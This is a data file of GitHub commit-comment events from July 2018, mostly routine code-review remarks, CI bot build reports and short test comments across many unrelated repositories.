{"id":"7962659458","type":"CommitCommentEvent","actor":{"login":"dimosha145"},"repo":{"name":"jshackles/idle_master"},"payload":{"comment":{"id":29701166,"position":8,"line":9,"path":"README.md","commit_id":"54c29261403d631702aefde4f7cc99057d36d7c5","created_at":"2018-07-13T14:57:39Z","updated_at":"2018-07-13T14:57:39Z","author_association":"NONE","body":"Hello, I checked you created (updated) Idle Master on Total Virus: https://www.virustotal.com/ru/, and I was shown that only 2 of 62 antiviruses have infected viruses and this virus is a miner,\r\nVBA32 TScope.Trojan.MSIL 20180712\r\nAnd one more virus,\r\nTrendMicro-HouseCall Suspicious_GEN.F47V0620 20180712\r\nwhy this utility is infected with a virus !?\r\nAnd I imagine how you on thousands of pc earns with the help of \"VIRUSES\""}},"created_at":"2018-07-13T14:57:39Z"}
{"id":"7962660820","type":"CommitCommentEvent","actor":{"login":"aldur"},"repo":{"name":"Hammerspoon/hammerspoon"},"payload":{"comment":{"id":29701170,"position":72,"line":100,"path":"extensions/spoons/init.lua","commit_id":"4b27616e8329e671aa2a9d8cc1b42fabaf5f6951","created_at":"2018-07-13T14:57:52Z","updated_at":"2018-07-13T14:57:52Z","author_association":"CONTRIBUTOR","body":"This broke the [`Seal` spoon](https://github.com/Hammerspoon/Spoons/blob/0fd96a289c0eedf0cc4b9265c22c1769c7e011b2/Source/Seal.spoon/init.lua#L24). If it's intended I can submit a PR to fix it."}},"created_at":"2018-07-13T14:57:52Z"}
{"id":"7962661495","type":"CommitCommentEvent","actor":{"login":"matyasselmeci"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29701172,"position":null,"line":null,"path":null,"commit_id":"0fc67c5f3b154be44342163494f898e9e0aedc86","created_at":"2018-07-13T14:57:59Z","updated_at":"2018-07-13T14:57:59Z","author_association":"NONE","body":"Well that's annoying."}},"created_at":"2018-07-13T14:57:59Z"}
{"id":"7962662679","type":"CommitCommentEvent","actor":{"login":"darrell-tethr"},"repo":{"name":"darrell-tethr/azure-marketplace"},"payload":{"comment":{"id":29701175,"position":null,"line":null,"path":null,"commit_id":"09cbc3d9770f8767cfa51432c1ceef1084e81cc9","created_at":"2018-07-13T14:58:13Z","updated_at":"2018-07-13T14:58:13Z","author_association":"OWNER","body":"UPDATE:  This change fixed a critical error.  The copyindex() was referencing the Outer Loop for the VM count number, which was no longer available. It was with VmId"}},"created_at":"2018-07-13T14:58:13Z"}
{"id":"7962665570","type":"CommitCommentEvent","actor":{"login":"cioan"},"repo":{"name":"openmrs/openmrs-react-components"},"payload":{"comment":{"id":29701181,"position":33,"line":53,"path":"src/domain/Patient.js","commit_id":"0e6d27a24839448e056ec13e7f7782175f5ae9be","created_at":"2018-07-13T14:58:41Z","updated_at":"2018-07-13T14:58:41Z","author_association":"MEMBER","body":"Thanks @mogoodrich ! I have changed the field to patient.identifiers and refactored the code."}},"created_at":"2018-07-13T14:58:41Z"}
{"id":"7962668395","type":"CommitCommentEvent","actor":{"login":"tdhooper"},"repo":{"name":"trevorvanhoof/sqrmelon"},"payload":{"comment":{"id":29701185,"position":10,"line":248,"path":"SqrMelon/scene.py","commit_id":"95890dfd34ec6337eba51d0418e442b94883d6fe","created_at":"2018-07-13T14:59:11Z","updated_at":"2018-07-13T14:59:11Z","author_association":"NONE","body":"This is much neater :) one thing, self._vao isn't used"}},"created_at":"2018-07-13T14:59:11Z"}
{"id":"7962668753","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29701186,"position":null,"line":null,"path":null,"commit_id":"5f918a94edea488d142caadf2553abf7f94eb0a5","created_at":"2018-07-13T14:59:14Z","updated_at":"2018-07-13T14:59:14Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180713-145914 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180713-145914\") to [dev](https://console.bluemix.net/apps/08bd5f06-5435-403b-9db3-f65271ff4df5?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-13T14:59:14Z"}
{"id":"7962672522","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":29701198,"position":47,"line":57,"path":"Sources/PackageLoading/ManifestLoader.swift","commit_id":"9c16353d06c071d365fe1cb1939748c07f0a2286","created_at":"2018-07-13T14:59:51Z","updated_at":"2018-07-13T14:59:51Z","author_association":"NONE","body":"You shouldn't need (or want) to do this...\r\n\r\n`isResultValid` should ideally only be used when trying to synchronize a value in the build system with some thing which is outside the build system (like the FileSystem)\r\n\r\nOnce something is inside the build, usually you should just let llbuild observe changes in the value.\r\n\r\nIn this case, this just means making the value `key.contents`, and llbuild will do the rest."}},"created_at":"2018-07-13T14:59:51Z"}
{"id":"7962681078","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29701217,"position":15,"line":83,"path":"code/drasil-code/Language/Drasil/CodeSpec.hs","commit_id":"62c37254b4ee21059c51187460bbc0f6b83a455e","created_at":"2018-07-13T15:01:12Z","updated_at":"2018-07-13T15:01:12Z","author_association":"COLLABORATOR","body":"@JacquesCarette In that case, should it be left as is or a different solution be implemented (e.g. below)?\r\n\r\n- create a `qtoc'` that takes in a `DataDefinition` and creates a `CodeDefinition` from that (although in this case the \"extra information\" is wasted as well since `qtoc` is currently defined as: https://github.com/JacquesCarette/Drasil/blob/bcd45daafc64ce5d4b5594c6d633bb50fc7e1a70/code/drasil-code/Language/Drasil/Chunk/Code.hs#L180-L181"}},"created_at":"2018-07-13T15:01:12Z"}
{"id":"7962684672","type":"CommitCommentEvent","actor":{"login":"sean-lockwood"},"repo":{"name":"spacetelescope/stisblazefix"},"payload":{"comment":{"id":29701221,"position":null,"line":null,"path":null,"commit_id":"71bbc47c9b55b775fe95411b651949834ed623a9","created_at":"2018-07-13T15:01:47Z","updated_at":"2018-07-13T15:01:47Z","author_association":"MEMBER","body":"Thanks Charles.\r\n\r\nI compared the x1f FITS files, and they're identical.  Blinking the plots, the only thing that changed was the reported error:  \"+/- 0.00\" --> \"+/- nan\".  I could change the code to return zeros if you think that's more accurate."}},"created_at":"2018-07-13T15:01:47Z"}
{"id":"7962691730","type":"CommitCommentEvent","actor":{"login":"charlesrp"},"repo":{"name":"spacetelescope/stisblazefix"},"payload":{"comment":{"id":29701229,"position":null,"line":null,"path":null,"commit_id":"71bbc47c9b55b775fe95411b651949834ed623a9","created_at":"2018-07-13T15:02:58Z","updated_at":"2018-07-13T15:02:58Z","author_association":"CONTRIBUTOR","body":"Hello Sean:\r\n\r\nLeaving it as nan should be fine.  If the user is specifying fixed parameters for the shift, the errors don’t really mean anything.\r\n\r\nCharles\r\n\r\nFrom: Sean Lockwood <notifications@github.com>\r\nReply-To: spacetelescope/stisblazefix <reply@reply.github.com>\r\nDate: Friday, July 13, 2018 at 11:01 AM\r\nTo: spacetelescope/stisblazefix <stisblazefix@noreply.github.com>\r\nCc: Charles Proffitt <proffitt@stsci.edu>, Comment <comment@noreply.github.com>\r\nSubject: Re: [spacetelescope/stisblazefix] Skipping fitting when iterate=False is specified. Updated to v1.1. (71bbc47)\r\n\r\n\r\nThanks Charles.\r\n\r\nI compared the x1f FITS files, and they're identical. Blinking the plots, the only thing that changed was the reported error: \"+/- 0.00\" --> \"+/- nan\". I could change the code to return zeros if you think that's more accurate.\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/spacetelescope/stisblazefix/commit/71bbc47c9b55b775fe95411b651949834ed623a9#commitcomment-29701221>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AFM3AomB4euqgVVIGLos6guxkrTpJgCVks5uGLZbgaJpZM4VN2SJ>.\r\n"}},"created_at":"2018-07-13T15:02:58Z"}
{"id":"7962693179","type":"CommitCommentEvent","actor":{"login":"github422433444344343"},"repo":{"name":"github422433444344343/Calculator"},"payload":{"comment":{"id":29701231,"position":null,"line":null,"path":null,"commit_id":"92555506b90a897ba2be03dca24299298971b613","created_at":"2018-07-13T15:03:13Z","updated_at":"2018-07-13T15:03:13Z","author_association":"OWNER","body":"#import \"ViewController.h\"\r\n\r\n@interface ViewController ()\r\n@property (weak, nonatomic) IBOutlet UITextField *num1;      //定义第一个text\r\n@property (weak, nonatomic) IBOutlet UITextField *num2;      //定义第二个text\r\n@property (weak, nonatomic) IBOutlet UILabel *answer;\r\n\r\n@end\r\n\r\n@implementation ViewController\r\n\r\n- (void)viewDidLoad {\r\n    [super viewDidLoad];\r\n    // Do any additional setup after loading the view, typically from a nib.\r\n}\r\n\r\n\r\n- (void)didReceiveMemoryWarning {\r\n    [super didReceiveMemoryWarning];\r\n    // Dispose of any resources that can be recreated.\r\n}\r\n- (IBAction)showAnswer:(id)sender\r\n{\r\n    int num1 = [self.num1.text intValue];\r\n    int num2 = [self.num2.text intValue];\r\n    int num3 = num1 + num2 ;\r\n    \r\n    self.answer.text = [NSString stringWithFormat:@\"%d\",num3];\r\n    [self.view endEditing:true];\r\n}\r\n\r\n@end\r\n"}},"created_at":"2018-07-13T15:03:13Z"}
{"id":"7962699612","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29701239,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-13T15:04:17Z","updated_at":"2018-07-13T15:04:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T15:04:17Z"}
{"id":"7962701859","type":"CommitCommentEvent","actor":{"login":"Matrix42"},"repo":{"name":"dawidwys/flink"},"payload":{"comment":{"id":29701245,"position":8,"line":56,"path":"docs/start/building.md","commit_id":"4f5538a05f0cd5135ed199c3aea5eefc114ca10b","created_at":"2018-07-13T15:04:40Z","updated_at":"2018-07-13T15:04:40Z","author_association":"NONE","body":"-DskipTests can be replaced with -Dmaven.test.skip=true, -Dmaven.test.skip=true can skip compile test classes."}},"created_at":"2018-07-13T15:04:40Z"}
{"id":"7962703058","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":29701247,"position":47,"line":57,"path":"Sources/PackageLoading/ManifestLoader.swift","commit_id":"9c16353d06c071d365fe1cb1939748c07f0a2286","created_at":"2018-07-13T15:04:52Z","updated_at":"2018-07-13T15:04:52Z","author_association":"NONE","body":"Random other comment -- remember to have a \"dependency\" on the version of SwiftPM in use -- you need to make sure things rebuild if the *logic* of the build changes. The simplest way is to have a dummy rule like \"swiftpm-version\" which encodes the version of SwiftPM as the value, then make things depend on that.\r\n"}},"created_at":"2018-07-13T15:04:52Z"}
{"id":"7962703421","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29701248,"position":null,"line":null,"path":null,"commit_id":"79c5d1a75cca63c191745cd1cc74a2e110a88168","created_at":"2018-07-13T15:04:56Z","updated_at":"2018-07-13T15:04:56Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das telas (Remoção de erros)](https://trello.com/c/imXGiTQq/198-refatora%C3%A7%C3%A3o-das-telas-remo%C3%A7%C3%A3o-de-erros)"}},"created_at":"2018-07-13T15:04:56Z"}
{"id":"7962704237","type":"CommitCommentEvent","actor":{"login":"brunimatteo88"},"repo":{"name":"gabri1/Expiry_list_javascript"},"payload":{"comment":{"id":29701249,"position":null,"line":null,"path":null,"commit_id":"59e99c740b8107a09e6af1917ca98e4b270eae5d","created_at":"2018-07-13T15:05:05Z","updated_at":"2018-07-13T15:05:05Z","author_association":"COLLABORATOR","body":"hai finito di cambiare true in false?!"}},"created_at":"2018-07-13T15:05:05Z"}
{"id":"7962711154","type":"CommitCommentEvent","actor":{"login":"Ex-Ark"},"repo":{"name":"leikir/http_forwarder"},"payload":{"comment":{"id":29701277,"position":18,"line":24,"path":"README.md","commit_id":"88be7eb7db5a3effdd27c7905f3c88edf662290c","created_at":"2018-07-13T15:06:10Z","updated_at":"2018-07-13T15:06:10Z","author_association":"COLLABORATOR","body":"on a http en dépendance dans le .gemspec de la gem.\r\nsi on bundle install sans , ça va fetch http.\r\npas besoin"}},"created_at":"2018-07-13T15:06:10Z"}
{"id":"7962711251","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29701278,"position":null,"line":null,"path":null,"commit_id":"0d772e2992138c820c793b125d4b735138aba8d6","created_at":"2018-07-13T15:06:11Z","updated_at":"2018-07-13T15:06:11Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2315 of 2316 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 628\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.11%25-green.png)</a>\n"}},"created_at":"2018-07-13T15:06:11Z"}
{"id":"7962721341","type":"CommitCommentEvent","actor":{"login":"emkurilenko"},"repo":{"name":"emkurilenko/testJS"},"payload":{"comment":{"id":29701296,"position":21,"line":21,"path":"js/arrayTool.js","commit_id":"aa5516f2502274adbae15cdc256e4a27b190bdbe","created_at":"2018-07-13T15:07:57Z","updated_at":"2018-07-13T15:07:57Z","author_association":"OWNER","body":"@ginkomix писал...\r\n\r\nНо в свой стек тоже нужно добавить JS\r\n"}},"created_at":"2018-07-13T15:07:57Z"}
{"id":"7962722294","type":"CommitCommentEvent","actor":{"login":"turion"},"repo":{"name":"turion/rhine"},"payload":{"comment":{"id":29701298,"position":9,"line":39,"path":"rhine/src/FRP/Rhine/Clock/Realtime/Stdin.hs","commit_id":"416b5c1a02a72297da53bac9c64aafed13e43180","created_at":"2018-07-13T15:08:08Z","updated_at":"2018-07-13T15:08:08Z","author_association":"OWNER","body":"Nice!"}},"created_at":"2018-07-13T15:08:08Z"}
{"id":"7962723189","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29701300,"position":null,"line":null,"path":null,"commit_id":"0d772e2992138c820c793b125d4b735138aba8d6","created_at":"2018-07-13T15:08:16Z","updated_at":"2018-07-13T15:08:16Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-13T15:08:16Z"}
{"id":"7962724544","type":"CommitCommentEvent","actor":{"login":"rramo012"},"repo":{"name":"BoldGrid/library"},"payload":{"comment":{"id":29701304,"position":146,"line":146,"path":"src/Library/Notice/ClaimPremiumKey.php","commit_id":"f4c6a58a8a10eb7968eeebe311f814b45004218b","created_at":"2018-07-13T15:08:31Z","updated_at":"2018-07-13T15:08:31Z","author_association":"MEMBER","body":"This is a fatal error"}},"created_at":"2018-07-13T15:08:31Z"}
{"id":"7962727055","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29701310,"position":null,"line":null,"path":null,"commit_id":"4f22f9c0928f8c1fb23e1d028ef67734a997f642","created_at":"2018-07-13T15:08:58Z","updated_at":"2018-07-13T15:08:58Z","author_association":"OWNER","body":"Ack, we need to make a proper RealPlume config then. I don't know why I just stuck it in the file"}},"created_at":"2018-07-13T15:08:58Z"}
{"id":"7962729569","type":"CommitCommentEvent","actor":{"login":"BhnxoRclg"},"repo":{"name":"proxyee-down-org/proxyee-down"},"payload":{"comment":{"id":29701319,"position":null,"line":null,"path":null,"commit_id":"e03d22aff4fe7505b2bd359ddf9f73bde21d171b","created_at":"2018-07-13T15:09:25Z","updated_at":"2018-07-13T15:09:25Z","author_association":"NONE","body":"新版本不能和ssr共存怎么办？"}},"created_at":"2018-07-13T15:09:25Z"}
{"id":"7962729812","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29701320,"position":32,"line":32,"path":"lesson4/railRoad.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T15:09:28Z","updated_at":"2018-07-13T15:09:28Z","author_association":"NONE","body":"val плохое название для переменной. Может choise?"}},"created_at":"2018-07-13T15:09:28Z"}
{"id":"7962730893","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29701323,"position":33,"line":33,"path":"lesson4/railRoad.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T15:09:39Z","updated_at":"2018-07-13T15:09:39Z","author_association":"NONE","body":"скобки не нужны"}},"created_at":"2018-07-13T15:09:39Z"}
{"id":"7962731169","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29701325,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-13T15:09:43Z","updated_at":"2018-07-13T15:09:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T15:09:43Z"}
{"id":"7962734838","type":"CommitCommentEvent","actor":{"login":"mfoll"},"repo":{"name":"IARCbioinfo/platypus-nf"},"payload":{"comment":{"id":29701332,"position":null,"line":null,"path":null,"commit_id":"fb5aedf60b543c10ea3a1a3d3dae09c8c53ebd20","created_at":"2018-07-13T15:10:21Z","updated_at":"2018-07-13T15:10:21Z","author_association":"MEMBER","body":"Don't you prefer `bcftools view -f PASS !{vcf_tag}.vcf` to filter rather than the not-so-robust `grep`? (also this could be piped directly to platypus but the same applies for compression and this is rather a trade-off with code clarity)"}},"created_at":"2018-07-13T15:10:21Z"}
{"id":"7962737807","type":"CommitCommentEvent","actor":{"login":"songnoh"},"repo":{"name":"songnoh/songnoh.github.io"},"payload":{"comment":{"id":29701339,"position":null,"line":null,"path":null,"commit_id":"7e4cd5f0bac6d84d002f1988f58e4cd2da39b6b3","created_at":"2018-07-13T15:10:53Z","updated_at":"2018-07-13T15:10:53Z","author_association":"OWNER","body":"Update index.html"}},"created_at":"2018-07-13T15:10:53Z"}
{"id":"7962740567","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29701344,"position":null,"line":null,"path":null,"commit_id":"c477f76320c93cd5a7247c8ab29061642cddb464","created_at":"2018-07-13T15:11:22Z","updated_at":"2018-07-13T15:11:22Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-360](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-360).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-360-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T15:11:22Z"}
{"id":"7962741391","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29701347,"position":78,"line":78,"path":"lesson4/railRoad.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T15:11:31Z","updated_at":"2018-07-13T15:11:31Z","author_association":"NONE","body":"А нельзя добавить вагон из уже существующих?"}},"created_at":"2018-07-13T15:11:31Z"}
{"id":"7962741853","type":"CommitCommentEvent","actor":{"login":"ozgurakgun"},"repo":{"name":"conjure-cp/conjure"},"payload":{"comment":{"id":29701348,"position":null,"line":null,"path":null,"commit_id":"df9fa68836e18ea80fb91a93e1e65384c8bce08f","created_at":"2018-07-13T15:11:36Z","updated_at":"2018-07-13T15:11:36Z","author_association":"COLLABORATOR","body":"Also see [this](https://github.com/conjure-cp/conjure/commit/8132de9dad5e8a4618b5cb6428e4e943a546a0fd).\r\n\r\nAnother fix coming."}},"created_at":"2018-07-13T15:11:36Z"}
{"id":"7962743909","type":"CommitCommentEvent","actor":{"login":"MKleusberg"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":29701354,"position":null,"line":null,"path":null,"commit_id":"c150d1a7664eb02c669e609ee0b01d9c93ad3336","created_at":"2018-07-13T15:11:59Z","updated_at":"2018-07-13T15:11:59Z","author_association":"MEMBER","body":"I'll deal with the build error later. I think it's just the older Qt version we're using on Travis. Should be possible to work around this by casting the values passed to ```QCOMPARE``` to have exactly the same type."}},"created_at":"2018-07-13T15:11:59Z"}
{"id":"7962748903","type":"CommitCommentEvent","actor":{"login":"eswick"},"repo":{"name":"GaryniL/ondeviceconsole"},"payload":{"comment":{"id":29701373,"position":null,"line":null,"path":null,"commit_id":"a93212ac30528d63a1d01a8b84609ff756a63f3d","created_at":"2018-07-13T15:12:54Z","updated_at":"2018-07-13T15:12:54Z","author_association":"NONE","body":"Nice!"}},"created_at":"2018-07-13T15:12:54Z"}
{"id":"7962749470","type":"CommitCommentEvent","actor":{"login":"jlblancoc"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29701375,"position":51,"line":357,"path":"gui/CMainWindow.cpp","commit_id":"6931b825544acca912e0298e8c373a756cb6d37c","created_at":"2018-07-13T15:13:00Z","updated_at":"2018-07-13T15:13:00Z","author_association":"NONE","body":"Why not creating a QObject, storing a reference or pointer to your object?\n;-)\n"}},"created_at":"2018-07-13T15:13:00Z"}
{"id":"7962749815","type":"CommitCommentEvent","actor":{"login":"rosik"},"repo":{"name":"tarantool/tarantool"},"payload":{"comment":{"id":29701376,"position":8,"line":228,"path":"src/lua/init.c","commit_id":"c0b9b7681a21a06339a3e3b5e183597951a810d6","created_at":"2018-07-13T15:13:03Z","updated_at":"2018-07-13T15:13:03Z","author_association":"NONE","body":"And here `luaL_pushint64(L, -result);`"}},"created_at":"2018-07-13T15:13:03Z"}
{"id":"7962752125","type":"CommitCommentEvent","actor":{"login":"ShibuKuppelanLearning"},"repo":{"name":"ShibuKuppelanLearning/Java"},"payload":{"comment":{"id":29701380,"position":null,"line":null,"path":null,"commit_id":"b578ddd71ac1e51e51861175518d839d71d62c0c","created_at":"2018-07-13T15:13:29Z","updated_at":"2018-07-13T15:13:29Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-13T15:13:29Z"}
{"id":"7962752473","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29701382,"position":84,"line":84,"path":"lesson4/railRoad.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T15:13:32Z","updated_at":"2018-07-13T15:13:32Z","author_association":"NONE","body":"detach_wagon пока просто выбрасывает вагон. Вагоны тоже нужно где-то хранить, что-бы они не были одноразовыми"}},"created_at":"2018-07-13T15:13:32Z"}
{"id":"7962752778","type":"CommitCommentEvent","actor":{"login":"ShibuKuppelanLearning"},"repo":{"name":"ShibuKuppelanLearning/Java"},"payload":{"comment":{"id":29701384,"position":null,"line":null,"path":null,"commit_id":"b578ddd71ac1e51e51861175518d839d71d62c0c","created_at":"2018-07-13T15:13:35Z","updated_at":"2018-07-13T15:13:35Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-13T15:13:35Z"}
{"id":"7962753483","type":"CommitCommentEvent","actor":{"login":"zb-alive"},"repo":{"name":"zb-alive/learngit"},"payload":{"comment":{"id":29701387,"position":null,"line":null,"path":null,"commit_id":"9dd71fddbeed4468aa931364ab1db9b1c6caf661","created_at":"2018-07-13T15:13:42Z","updated_at":"2018-07-13T15:13:42Z","author_association":"OWNER","body":"feffewfw"}},"created_at":"2018-07-13T15:13:42Z"}
{"id":"7962754381","type":"CommitCommentEvent","actor":{"login":"zb-alive"},"repo":{"name":"zb-alive/learngit"},"payload":{"comment":{"id":29701389,"position":null,"line":null,"path":null,"commit_id":"9dd71fddbeed4468aa931364ab1db9b1c6caf661","created_at":"2018-07-13T15:13:52Z","updated_at":"2018-07-13T15:13:52Z","author_association":"OWNER","body":"fewefw"}},"created_at":"2018-07-13T15:13:52Z"}
{"id":"7962758339","type":"CommitCommentEvent","actor":{"login":"GaryniL"},"repo":{"name":"GaryniL/ondeviceconsole"},"payload":{"comment":{"id":29701399,"position":null,"line":null,"path":null,"commit_id":"a93212ac30528d63a1d01a8b84609ff756a63f3d","created_at":"2018-07-13T15:14:33Z","updated_at":"2018-07-13T15:14:33Z","author_association":"OWNER","body":"Thanks! However, I think put the jtool binary in repo is not really good.Do you have any idea for this problem? Thanks! Look forward to your updating on bigboss!"}},"created_at":"2018-07-13T15:14:33Z"}
{"id":"7962764756","type":"CommitCommentEvent","actor":{"login":"bahuasheng"},"repo":{"name":"otherwise777/Temporal_Graph_library"},"payload":{"comment":{"id":29701407,"position":null,"line":null,"path":null,"commit_id":"d724d8883c551317af3acf1f7d065d429056fa82","created_at":"2018-07-13T15:15:46Z","updated_at":"2018-07-13T15:15:46Z","author_association":"NONE","body":"what effects will the distribution bug cause?"}},"created_at":"2018-07-13T15:15:46Z"}
{"id":"7962766904","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29701411,"position":null,"line":null,"path":null,"commit_id":"83bd7dafb6ee959159b2e6f954d9666887790135","created_at":"2018-07-13T15:16:10Z","updated_at":"2018-07-13T15:16:10Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-786](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-786).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-786-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-13T15:16:10Z"}
{"id":"7962767574","type":"CommitCommentEvent","actor":{"login":"rosy1280"},"repo":{"name":"OCFL/spec"},"payload":{"comment":{"id":29701412,"position":null,"line":null,"path":null,"commit_id":"5c78ddef24370b95e733e3966a945c41cc9930a3","created_at":"2018-07-13T15:16:16Z","updated_at":"2018-07-13T15:16:16Z","author_association":"NONE","body":"@zimeon on line 206 \"ALL versions of an object MUST use...\" or is it \"ALL versions in a storage root MUST use...\". I think being clear on that is important. "}},"created_at":"2018-07-13T15:16:16Z"}
